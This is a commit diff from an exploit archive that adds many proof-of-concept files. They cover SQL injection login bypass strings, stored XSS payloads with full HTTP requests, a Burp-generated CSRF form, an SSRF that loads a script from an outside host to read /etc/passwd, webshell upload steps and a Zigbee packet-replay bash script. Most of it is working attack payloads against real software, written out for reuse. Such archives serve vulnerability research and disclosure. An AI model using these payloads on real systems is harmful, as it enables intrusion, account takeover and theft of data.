DB: 2020-12-03
32 changes to exploits/shellcodes aSc TimeTables 2021.6.2 - Denial of Service (PoC) IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path Microsoft Windows - Win32k Elevation of Privilege Ksix Zigbee Devices - Playback Protection Bypass (PoC) Mitel mitel-cs018 - Call Data Information Disclosure Expense Management System - 'description' Stored Cross Site Scripting ILIAS Learning Management System 4.3 - SSRF Pharmacy Store Management System 1.0 - 'id' SQL Injection Under Construction Page with CPanel 1.0 - SQL injection EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF Student Result Management System 1.0 - Authentication Bypass SQL Injection EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution WonderCMS 3.1.3 - Authenticated Remote Code Execution PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting NewsLister - Authenticated Persistent Cross-Site Scripting Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile DotCMS 20.11 - Stored Cross-Site Scripting WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass ChurchCRM 4.2.0 - CSV/Formula Injection ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS) Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover Simple College Website 1.0 - 'page' Local File Inclusion Car Rental Management System 1.0 - SQL Injection / Local File include WordPress Plugin Wp-FileManager 6.8 - RCE
This commit is contained in:
parent
4b9e53700f
commit
0ffa4d35c4
33 changed files with 1317 additions and 0 deletions
43
exploits/linux/remote/49176.txt
Normal file
43
exploits/linux/remote/49176.txt
Normal file
|
@ -0,0 +1,43 @@
|
|||
# Exploit Title: Mitel mitel-cs018 - Call Data Information Disclosure
|
||||
# Date: 2003-07-28
|
||||
# Exploit Author: Andrea Intilangelo (acme olografix / paranoici)
|
||||
# Vendor Homepage: www.mitel.com
|
||||
# Version: mitel-cs018
|
||||
# Tested on: Windows, Linux
|
||||
|
||||
There is an interesting bug in a Mitel's servers for Voice over IP that allows to discover the numbers called and the numbers calling trought this dhcp server. This server is configurable via http interface and via telnet; in this case, if there is a call at moment of login/pass request, I've noted this:
|
||||
|
||||
Trying 192.168.1.2...
|
||||
Connected to 192.168.1.2.
|
||||
Escape character is '^]'.
|
||||
Username: mitel-cs018
|
||||
Password:
|
||||
ERROR: Invalid Username/Password pair
|
||||
Username:
|
||||
Password:
|
||||
Username: ^X^W^E^Q^W
|
||||
Password:
|
||||
ERROR: Invalid Username/Password pair
|
||||
Username: Password:
|
||||
ERROR: Invalid Username/Password pair
|
||||
# in this moment a foreign call arrive from outside
|
||||
Username: 155 OGIN 149 11:11:55 D 2
|
||||
156 ICIN 11:12: 6 D 4 0xxxXxxxxx
|
||||
157 XFIC 156 11:12: 6 151 0: 9:47 D 3
|
||||
158 ICIN 11:12: 6 D 3 0xxxXxxxxx
|
||||
159 ANSW 146 11:12:11 0: 0: 9 D 4
|
||||
160 HDIN 146 11:12:21 D 4
|
||||
162 HREC 146 11:12:27 0: 0: 6 D 4
|
||||
163 ABND ? 11:12:37 0: 0:37 D 3 0xxxXxxxxx
|
||||
164 ICIN 11:12:43 D 3 0xxxXxxxxx
|
||||
165 EXIC 146 11:12:54 0: 0:47 D 4
|
||||
166 ANSW 146 11:13: 0 0: 0:16 D 3
|
||||
167 HDIN 146 11:13: 6 D 3
|
||||
169 EXIC 146 11:13:13 156 0: 0:12 D 3
|
||||
171 EXOG 149 11:13:46 0: 1:59 D 2 0xxXxxxxx
|
||||
172 XFIC 156 11:16:53 146 0: 3:40 D 3
|
||||
# where "0xxXxxxxx" are telephone numbers
|
||||
A derives table results is:
|
||||
SEQ CODE EXT ACC TIME RX TX DURATION LN DIALLED DIGITS COST
|
||||
No. No. COD HH:MM:SS FROM TO HH:MM:SS No.
|
||||
___ _____ ____ ____ ________ ____ ____ ____________ ______________ _______
|
95
exploits/multiple/remote/49169.sh
Executable file
95
exploits/multiple/remote/49169.sh
Executable file
|
@ -0,0 +1,95 @@
|
|||
# Exploit Title: Ksix Zigbee Devices - Playback Protection Bypass (PoC)
|
||||
# Date: 2020-11-15
|
||||
# Exploit Author: Alejandro Vazquez Vazquez
|
||||
# Vendor Homepage: https://www.ksixmobile.com/
|
||||
# Firmware Version: (Gateway Zigbee Module - v1.0.3, Gateway Main Module - v1.1.2, Door Sensor - v1.0.7, PIR Motion Sensor - v1.0.12)
|
||||
# Tested on: Kali Linux 2020.3
|
||||
|
||||
# The coordinator of the Zigbee network (Zigbee gateway) does not correctly check the sequence number of the packets that are sent to it, which allows forging messages from an end device to the coordinator (example: turn on a light bulb, open a door, ...) by injecting a very large value in the "sequence number" field.
|
||||
# To exploit this vulnerability
|
||||
# 1. Capture Zigbee traffic with a sniffer (Api-Mote) and save it in .pcap format
|
||||
# 2. Open the file with Wireshark and locate the packet you want to forward (turn on a light bulb, open a door, ...)
|
||||
# 3. Copy that packet as "hex dump" and save it to a .txt file
|
||||
# 4. Modify the "sequence number" field to a high value such as 250
|
||||
# 5. Convert the txt file to .pcap again
|
||||
# 6. Forward the packet to the network, using a tool such as Killerbee
|
||||
|
||||
#!/bin/bash
|
||||
|
||||
function usage(){
|
||||
echo -e "\nUsage: $0 [ZigbeeChannel] [SecuenceNumber] [HexDumpFile] [ShortSource] [ExtendedSource] [ShortDestination] [ShortPanId] [FCS]"
|
||||
echo -e "Example: $0 11 250 Open_Door_Alert_Hex_Dump 0x0001 11:ff:11:ff:11:ff:11:ff 0x0000 0x3333 0x0000 \n"
|
||||
echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n"
|
||||
}
|
||||
|
||||
function message(){
|
||||
echo -e "\nProof of Concept"
|
||||
echo -e "There is an incorrect check of the \"sequence number\" field on Ksix Zigbee devices\n"
|
||||
echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n"
|
||||
}
|
||||
|
||||
function poc_playback(){
|
||||
# Variables
|
||||
ZIGBEE_CHANNEL=$1
|
||||
SECUENCE_NUMBER=$2
|
||||
HEX_DUMP_FILE=$3
|
||||
SHORT_SOURCE=$4
|
||||
EXTENDED_SOURCE=$5
|
||||
SHORT_DESTINATION=$6
|
||||
SHORT_PAN_DESTINATION=$7
|
||||
FRAME_CHECK_SECUENCE=$8
|
||||
declare -a first_line_array
|
||||
declare -a second_line_array
|
||||
declare -a last_line_array
|
||||
# Change packet fields
|
||||
while IFS= read -r line
|
||||
do
|
||||
if [[ "$line" == "0000"* ]]; then
|
||||
IFS=' ' read -ra first_line_array <<< "$line"
|
||||
first_line_array[0]+=" "
|
||||
first_line_array[3]=$( printf "%x" $SECUENCE_NUMBER )
|
||||
first_line_array[4]=${SHORT_PAN_DESTINATION:4:2}
|
||||
first_line_array[5]=${SHORT_PAN_DESTINATION:2:2}
|
||||
first_line_array[6]=${SHORT_DESTINATION:4:2}; first_line_array[11]=${SHORT_DESTINATION:4:2}
|
||||
first_line_array[7]=${SHORT_DESTINATION:2:2}; first_line_array[12]=${SHORT_DESTINATION:2:2}
|
||||
first_line_array[8]=${SHORT_SOURCE:4:2}; first_line_array[13]=${SHORT_SOURCE:4:2}
|
||||
first_line_array[9]=${SHORT_SOURCE:2:2}; first_line_array[14]=${SHORT_SOURCE:2:2}
|
||||
echo "${first_line_array[@]}" > Check_Secuence_Number_Incorrectly_HEX_Dump
|
||||
elif [[ "$line" == "0010"* ]]; then
|
||||
IFS=' ' read -ra second_line_array <<< "$line"
|
||||
second_line_array[0]+=" "
|
||||
second_line_array[7]=${EXTENDED_SOURCE:21:2}; second_line_array[8]=${EXTENDED_SOURCE:18:2}
|
||||
second_line_array[9]=${EXTENDED_SOURCE:15:2}; second_line_array[10]=${EXTENDED_SOURCE:12:2}
|
||||
second_line_array[11]=${EXTENDED_SOURCE:9:2}; second_line_array[12]=${EXTENDED_SOURCE:6:2}
|
||||
second_line_array[13]=${EXTENDED_SOURCE:3:2}; second_line_array[14]=${EXTENDED_SOURCE:0:2}
|
||||
echo "${second_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump
|
||||
elif [[ "$line" == "0030"* ]]; then
|
||||
IFS=' ' read -ra last_line_array <<< "$line"
|
||||
last_line_array[0]+=" "
|
||||
last_line_array[11]=${FRAME_CHECK_SECUENCE:4:2}
|
||||
last_line_array[12]=${FRAME_CHECK_SECUENCE:2:2}
|
||||
echo "${last_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump
|
||||
else
|
||||
echo "$line" >> Check_Secuence_Number_Incorrectly_HEX_Dump
|
||||
fi
|
||||
done < $HEX_DUMP_FILE
|
||||
# Hex Dump file to pcap
|
||||
text2pcap Check_Secuence_Number_Incorrectly_HEX_Dump Check_Secuence_Number_Incorrectly.pcap
|
||||
# Playback
|
||||
zbreplay --channel $ZIGBEE_CHANNEL --pcapfile Check_Secuence_Number_Incorrectly.pcap && echo -e "\nPacket sent to the network. Poc Completed.\n"
|
||||
}
|
||||
|
||||
function main(){
|
||||
if [ $# -lt 8 ]; then
|
||||
echo -e "\n\t Missing arguments"
|
||||
usage
|
||||
exit
|
||||
else
|
||||
message
|
||||
poc_playback $1 $2 $3 $4 $5 $6 $7 $8
|
||||
fi
|
||||
}
|
||||
|
||||
main $1 $2 $3 $4 $5 $6 $7 $8
|
||||
|
||||
#NOTE: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message "Door open".
|
39
exploits/multiple/webapps/49146.txt
Normal file
39
exploits/multiple/webapps/49146.txt
Normal file
|
@ -0,0 +1,39 @@
|
|||
# Exploit Title: Expense Management System - 'description' Stored Cross Site Scripting
|
||||
# Date: 02/12/2020
|
||||
# Exploit Author: Nikhil Kumar
|
||||
# Vendor Homepage: http://egavilanmedia.com/
|
||||
# Software Link: http://egavilanmedia.com/expense-management-system/
|
||||
# Tested On: Ubuntu
|
||||
|
||||
Vunerable Parameter: "description="
|
||||
|
||||
Steps to Reproduce:
|
||||
|
||||
1. Open the index.php page using following url
|
||||
|
||||
http://localhost/Expense-Management-System/index.php
|
||||
|
||||
click on Add Expense
|
||||
|
||||
2. Put a payload on "description=" parameter
|
||||
|
||||
Payload :- test"><script>alert("XSS")</script>
|
||||
|
||||
Malicious Request::
|
||||
|
||||
POST /Expense-Management-System/expense_action.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 140
|
||||
Origin: http://localhost
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Referer: http://localhost/Expense-Management-System/
|
||||
Cookie: PHPSESSID=45f122ec98900409467ac74f6113ff4a
|
||||
|
||||
description=test%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&amount=1234&date=2020%2F11%2F17&expense_id=&action=Add
|
33
exploits/multiple/webapps/49148.txt
Normal file
33
exploits/multiple/webapps/49148.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: ILIAS Learning Management System 4.3 - SSRF
|
||||
# Date: 10-08-2020
|
||||
# Exploit Author: Dot/kx1z0
|
||||
# Vendor Homepage: https://www.ilias.de/
|
||||
# Software Link: https://github.com/ILIAS-eLearning/ILIAS/tree/release_4-3
|
||||
# Version: 4.3-5.1
|
||||
# Tested on: Linux
|
||||
# Description
|
||||
We can create portfolios, export them to PDF and download them.
|
||||
The issue is that there is an HTML Injection, and if we inject HTML
|
||||
into the portfolio, when it is exported to PDF, it will be rendered.
|
||||
So we can take advantage that it is running under the wrapper file://
|
||||
to inject an XMLHttpRequest requesting the local file we want, that
|
||||
when downloading the PDF, we can see the content of that file
|
||||
|
||||
# Exploit
|
||||
We cannot inject the XMLHttpRequest directly into the content of the
|
||||
portfolio, as there is something blocking it. So we will have to host
|
||||
a script in our own server and invoke it from the portfolio
|
||||
|
||||
We insert this in the portfolio:
|
||||
<script src=host.com/test.js> </script>
|
||||
|
||||
Script in our server:
|
||||
x=new XMLHttpRequest;
|
||||
x.onload=function(){
|
||||
document.write(this.responseText)
|
||||
};
|
||||
x.open("GET","file:///etc/passwd");
|
||||
x.send();
|
||||
|
||||
So, finally, we will only have to download the PDF and there, will be
|
||||
the content of the file we have requested.
|
26
exploits/multiple/webapps/49150.txt
Normal file
26
exploits/multiple/webapps/49150.txt
Normal file
|
@ -0,0 +1,26 @@
|
|||
# Exploit Title: Under Construction Page with CPanel 1.0 - SQL injection
|
||||
# Date: 17-11-2020
|
||||
# Exploit Author: Mayur Parmar(th3cyb3rc0p)
|
||||
# Vendor Homepage: http://egavilanmedia.com
|
||||
# Software Link : http://egavilanmedia.com/under-construction-page-with-cpanel/
|
||||
# Version: 1.0
|
||||
# Tested on: PopOS
|
||||
|
||||
SQL Injection:
|
||||
SQL injection is a web security vulnerability that allows an attacker
|
||||
to alter the SQL queries made to the database. This can be used to
|
||||
retrieve some sensitive information, like database structure, tables,
|
||||
columns, and their underlying data.
|
||||
|
||||
Attack Vector:
|
||||
An attacker can gain admin panel access using malicious sql injection queries.
|
||||
|
||||
Steps to reproduce:
|
||||
1. Open admin login page using following URl:
|
||||
-> http://localhost/Under%20Construction/admin/login.php
|
||||
|
||||
2. Now put below Payload in both the fields( User ID & Password)
|
||||
Payload: admin' or '1'='1
|
||||
|
||||
3. Server accepted our payload and we bypassed cpanel without any
|
||||
credentials
|
65
exploits/multiple/webapps/49151.txt
Normal file
65
exploits/multiple/webapps/49151.txt
Normal file
|
@ -0,0 +1,65 @@
|
|||
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF
|
||||
# Date: 01-12-2020
|
||||
# Exploit Author: Hardik Solanki
|
||||
# Vendor Homepage: http://egavilanmedia.com
|
||||
# Software Link: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
|
||||
# Version: 1.0
|
||||
# Tested on Windows 10
|
||||
|
||||
CSRF ATTACK:
|
||||
Cross-site request forgery (also known as CSRF) is a web security
|
||||
vulnerability that allows an attacker to induce users to perform actions
|
||||
that they do not intend to perform. It allows an attacker to partly
|
||||
circumvent the same-origin policy, which is designed to prevent different
|
||||
websites from interfering with each other.
|
||||
|
||||
Attack Vector:
|
||||
An attacker can update any user's account. (Note: FULL NAME field is also
|
||||
vulnerable to stored XSS & attacker can steal the authenticated Session os
|
||||
the user)
|
||||
|
||||
Steps to reproduce:
|
||||
1. Open user login page using the following URL:
|
||||
->
|
||||
http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/login.html
|
||||
|
||||
2. Now login with the "attacker" user account & navigate to the edit
|
||||
profile tab. Click on the "Update" button and intercept the request in web
|
||||
proxy tool called "Burpusite"
|
||||
|
||||
3. Generate the CSRF POC from the burp tool. Copy the URL or Copy the below
|
||||
code.
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="
|
||||
http://localhost/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile_action.php"
|
||||
method="POST">
|
||||
<input type="hidden" name="fullname" value="Attacker" />
|
||||
<input type="hidden" name="username" value="hunterr" />
|
||||
<input type="hidden" name="email"
|
||||
value="noooobhunter@gmail.com" />
|
||||
<input type="hidden" name="gender" value="Male" />
|
||||
<input type="hidden" name="action" value="update_user" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
4. Now, login with the "Victim/Normal user" account. (Let that user is
|
||||
currently authenticated in the browser).
|
||||
|
||||
5. Paste the URL in the browser, which is copied in step 3. OR submit the
|
||||
CSRF POC code, which is shown in step 3.
|
||||
|
||||
6. We receive a "Status: Success", which indicates that the CSRF attack is
|
||||
successfully done & the Attacker can takeover the user account via Stored
|
||||
XSS (Steal the authenticated Cookies of the user from the "FULL NAME"
|
||||
parameter)
|
||||
|
||||
IMPACT:
|
||||
An attacker can takeover any user account. (Note: FULL NAME field is also
|
||||
vulnerable to stored XSS & attacker can steal the authenticated Session os
|
||||
the user)
|
32
exploits/multiple/webapps/49152.txt
Normal file
32
exploits/multiple/webapps/49152.txt
Normal file
|
@ -0,0 +1,32 @@
|
|||
# Exploit Title: Student Result Management System 1.0 - Authentication Bypass SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11/16/2020
|
||||
# Exploit Author: Ritesh Gohil
|
||||
# Vendor Homepage: https://projectnotes.org/it-projects/student-result-management-system-in-php-with-source-code/
|
||||
# Software Link: https://projectnotes.org/download/studentms-zip/
|
||||
# Version: 1.0
|
||||
# Tested on: Win10 x64, Kali Linux x64
|
||||
# CVE : N/A
|
||||
######## Description
|
||||
#################################################################
|
||||
#
|
||||
#
|
||||
# An SQL injection vulnerability discovered in PHP Student Result Management System #
|
||||
#
|
||||
#
|
||||
# Admin Login Portal is vulnerable to SQL Injection
|
||||
#
|
||||
#
|
||||
#
|
||||
# The vulnerability could allow for the improper neutralization of special elements #
|
||||
# in SQL commands and may lead to the product being vulnerable to SQL injection. #
|
||||
#
|
||||
#
|
||||
######################################################################################
|
||||
|
||||
Kindly Follow Below Steps:
|
||||
1. Visit the main page of the Student Result Management System.
|
||||
2. You will get an Admin Login Page.
|
||||
3. Payload which you can use in Email and password field:
|
||||
*AND 1=0 AND '%'='
|
||||
*4. You will get Admin Access of the Student Result Management System.
|
13
exploits/multiple/webapps/49153.txt
Normal file
13
exploits/multiple/webapps/49153.txt
Normal file
|
@ -0,0 +1,13 @@
|
|||
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting
|
||||
# Exploit Author: Soushikta Chowdhury
|
||||
# Vendor Homepage: http://egavilanmedia.com
|
||||
# Software Link: http://egavilanmedia.com/user-registration-and-login-system-with-admin-panel/
|
||||
# Version: 1.0
|
||||
# Tested on: Windows 10
|
||||
# Contact: https://www.linkedin.com/in/soushikta-chowdhury/
|
||||
|
||||
Vulnerable Parameters: Full Name
|
||||
Steps for reproduce:
|
||||
1. Go to registration page
|
||||
2. fill in the details & put <script>alert("soushikta")</script> payload in Full name.
|
||||
3. Now goto Admin Panel. After entering go to Manage Users and go to the last page to check the newly added user. We could see that our payload gets executed.
|
29
exploits/multiple/webapps/49159.txt
Normal file
29
exploits/multiple/webapps/49159.txt
Normal file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting
|
||||
# Date: 27-11-2020
|
||||
# Exploit Author: Sagar Banwa
|
||||
# Vendor Homepage: https://projectworlds.in/
|
||||
# Software Link: https://projectworlds.in/free-projects/php-projects/online-voting-system-project-in-php-2/
|
||||
# Tested on: Windows 10/Kali Linux
|
||||
|
||||
Steps-To-Reproduce:
|
||||
|
||||
1. Go to register
|
||||
2. Add the payload in Username : <script>alert(1)</script>
|
||||
3. And complete the register
|
||||
4. Login to the account
|
||||
|
||||
POST /vote/reg_action.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 593
|
||||
Origin: http://localhost
|
||||
Connection: close
|
||||
Referer: http://localhost/vote/register.php
|
||||
Cookie: PHPSESSID=1sqkq0u1m2j47906htd45opcep
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
firstname=user1&lastname=user2&username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=testtest&g-recaptcha-response=03AGdBq24TB5LilE4y9YCZx4I_XrKLBs2ftYrVEJ70_vhpDG-FXCKhzfB-EmAD-NnhKRSZ8_A88_ZNB4nXnwMBs8cU1Qgrqzs8Yme0Bmral8WRK1umGikJeDzliuigIKgZ6Q2Me9zGS-ecZyrujgF4tKSlMs3K_KNgVhEhlAsslrfBe7jQg40aG3PdMCXTTOst4Lt91vswl1G_dmYjrLEh7AfLJS7XYgXrEt4Pfau_mJ3KzE_hf-MxbpTI9_NkCLanUiW8-VI1t3uopUbSE9xH53X1cUExoe_dGpwnkygZw_4yEDp-iBYA73wql5ow1W43OIn5pmSBz_Sdv1VbfAqbFMEIXXJx4o5D_TLiVKLDQCj2Vy-fRmohlpYwV76NR5Iu2D693FKCs3KODRNSaitpOevSfcYh3h05vCGuPSO1fCu4c3v1daiIdFKPwDvfKS_Lm8jgoFK4kfnZ&submit=Next
|
29
exploits/multiple/webapps/49160.txt
Normal file
29
exploits/multiple/webapps/49160.txt
Normal file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: NewsLister - Authenticated Persistent Cross-Site Scripting
|
||||
# Date: 2020-11-27
|
||||
# Exploit Author: Emre Aslan
|
||||
# Vendor Homepage: https://www.netartmedia.net/newslister.html
|
||||
# Tested on: Windows & XAMPP
|
||||
|
||||
==> PoC <==
|
||||
|
||||
1- Login to admin panel.
|
||||
2- Enter the payload to title value.
|
||||
3- View the news. XSS will be execute.
|
||||
|
||||
==> HTTP Request <==
|
||||
|
||||
GET /admin/index.php?page=add HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
Connection: keep-alive
|
||||
Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-User: ?1
|
||||
Sec-Fetch-Dest: document
|
||||
Referer: host/admin/index.php?page=home
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Cookie: AuthUser=administrator~da1907216877e31462c14b35db67de32~1606484275; PHPSESSID=nn5gq66nla4lfs47fq9eoctvuf
|
17
exploits/multiple/webapps/49161.txt
Normal file
17
exploits/multiple/webapps/49161.txt
Normal file
|
@ -0,0 +1,17 @@
|
|||
# Exploit Title: Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting
|
||||
# Date: 26-11-2020
|
||||
# Exploit Author: Parshwa Bhavsar
|
||||
# Vendor Homepage: https://www.sourcecodester.com/
|
||||
# Software Link: https://www.sourcecodester.com/php/14609/bakeshop-online-ordering-system-phpmysqli-full-source-code.html
|
||||
# Version: 1.0
|
||||
# Tested on: Windows 10/XAMPP
|
||||
|
||||
Payload : "><img src=x onerror=alert(1)>
|
||||
|
||||
|
||||
Steps to Reproduce :-
|
||||
|
||||
1. Login in admin dashboard & Click on 'Categories'.
|
||||
2. You will notice the "New" button ,Click on that and You will notice the "Category" input field.
|
||||
3. Put XSS Payload on that field and save it.
|
||||
4. XSS will be triggered.
|
33
exploits/multiple/webapps/49162.txt
Normal file
33
exploits/multiple/webapps/49162.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting
|
||||
# Date: 24-11-2020
|
||||
# Exploit Author: Parshwa Bhavsar
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip
|
||||
# Version: 1.0
|
||||
# Tested on: Windows 10/XAMPP
|
||||
|
||||
Stored Cross-site scripting(XSS):
|
||||
Stored XSS, also known as persistent XSS, is the more damaging of the
|
||||
two. It occurs when a malicious script is injected directly into a
|
||||
vulnerable web application.
|
||||
|
||||
Attack Vector :
|
||||
|
||||
This vulnerability can result in the attacker to inject the XSS
|
||||
payload in the Title field of the page and each time any user will
|
||||
open the website, the XSS triggers and attacker can able to steal the
|
||||
cookie according to the crafted payload.
|
||||
|
||||
Vulnerable Parameters: Title Parameter in Edit Post Page.
|
||||
|
||||
Payload : "><img src=x Onmouseover=alert(document.domain)>
|
||||
|
||||
Vulnerable URL :
|
||||
http://localhost/online-news-portal/news_portal/admin/index.php?page=new_post
|
||||
|
||||
Steps To Reproduce :
|
||||
1) Go to the admin Dashboard
|
||||
2) Click on Posts and click Add New button.
|
||||
3) Put Payload into the Title parameter.
|
||||
4) Click on Save.
|
||||
5) XSS payload will be triggered.
|
28
exploits/multiple/webapps/49163.txt
Normal file
28
exploits/multiple/webapps/49163.txt
Normal file
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass
|
||||
# Date: 21/11/2020
|
||||
# Exploit Author: Aditya Wakhlu
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip
|
||||
# Version: 1.0
|
||||
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
|
||||
|
||||
Step 1: Open the URL http://localhost:8080/lssems/admin/login.php
|
||||
Step 2: use payload Aditya' or 1=1# in user and password field
|
||||
|
||||
Malicious Request:::
|
||||
|
||||
POST /lssems/admin/ajax.php?action=login HTTP/1.1
|
||||
Host: localhost:8080
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 49
|
||||
Origin: http://localhost:8080
|
||||
Connection: close
|
||||
Referer: http://localhost:8080/lssems/admin/login.php
|
||||
Cookie: PHPSESSID=mpqu31slfcd7fjc89gm9veb1o3
|
||||
|
||||
username=Aditya'+or+1%3D1%23&password=Aditya'+or+1%3D1%23
|
16
exploits/multiple/webapps/49166.txt
Normal file
16
exploits/multiple/webapps/49166.txt
Normal file
|
@ -0,0 +1,16 @@
|
|||
# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated)
|
||||
# Date: November 17th, 2020
|
||||
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
|
||||
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
|
||||
# Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
|
||||
# Version: 1.0
|
||||
# Tested On: Windows 10 (XAMPP Server)
|
||||
# CVE: CVE-2020-28688
|
||||
---------------------
|
||||
Proof of Concept:
|
||||
---------------------
|
||||
1. Authenticate as a user (or signup as an artist)
|
||||
2. Click the drop down for your username and go to My ART+BAY
|
||||
3. Click on My Artworks > My Available Artworks > Add an Artwork
|
||||
4. Click on any type of artwork and instead of the picture, upload your php-shell > click on upload
|
||||
5. Find your shell at 'http://<ip>/<base_url>/pictures/arts/<shell.php>' and get command execution
|
15
exploits/multiple/webapps/49167.txt
Normal file
15
exploits/multiple/webapps/49167.txt
Normal file
|
@ -0,0 +1,15 @@
|
|||
# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile
|
||||
# Date: November 17th, 2020
|
||||
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
|
||||
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
|
||||
# Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
|
||||
# Version: 1.0
|
||||
# Tested On: Windows 10 (XAMPP Server)
|
||||
# CVE: CVE-2020-28687
|
||||
--------------------
|
||||
Proof of Concept:
|
||||
--------------------
|
||||
1. Authenticate as a user (or signup as an artist)
|
||||
2. Go to edit profile
|
||||
3. Upload a php-shell as profile picture and click update/save
|
||||
4. Find your shell at 'http://<ip>/<base_url>/pictures/profile/<shell.php>' and get command execution
|
15
